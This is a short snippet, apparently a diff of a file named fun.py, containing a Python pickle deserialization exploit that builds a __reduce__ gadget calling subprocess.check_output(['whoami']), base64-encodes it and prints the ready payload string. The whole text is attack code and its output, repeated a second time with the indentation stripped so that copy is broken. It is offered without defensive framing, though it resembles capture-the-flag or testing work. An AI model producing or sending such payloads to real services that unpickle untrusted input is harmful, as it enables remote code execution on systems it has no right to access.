Jonoans · June 20, 2020 16:51
diff --git a/fun.py b/fun.py
 import base64
 import codecs
 import pickle

 class RCE(object):
    def __reduce__(self):
        import subprocess
        return (subprocess.check_output, (['whoami'], ) )

 class RCEStr(object):
    def __reduce__(self):
        return (codecs.decode, (RCE(), 'utf-8') )

 pickle_data = pickle.dumps({'name': RCEStr()})
 payload = base64.urlsafe_b64encode(pickle_data)
 print(payload.decode('utf-8'))
 # Outputs: gAN9cQBYBAAAAG5hbWVxAWNfY29kZWNzCmRlY29kZQpxAmNzdWJwcm9jZXNzCmNoZWNrX291dHB1dApxA11xBFgGAAAAd2hvYW1pcQVhhXEGUnEHWAUAAAB1dGYtOHEIhnEJUnEKcy4=
	import base64
	import codecs
	import pickle

	class RCE(object):
	def __reduce__(self):
	import subprocess
	return (subprocess.check_output, (['whoami'], ) )

	class RCEStr(object):
	def __reduce__(self):
	return (codecs.decode, (RCE(), 'utf-8') )

	pickle_data = pickle.dumps({'name': RCEStr()})
	payload = base64.urlsafe_b64encode(pickle_data)
	print(payload.decode('utf-8'))
	# Outputs: gAN9cQBYBAAAAG5hbWVxAWNfY29kZWNzCmRlY29kZQpxAmNzdWJwcm9jZXNzCmNoZWNrX291dHB1dApxA11xBFgGAAAAd2hvYW1pcQVhhXEGUnEHWAUAAAB1dGYtOHEIhnEJUnEKcy4=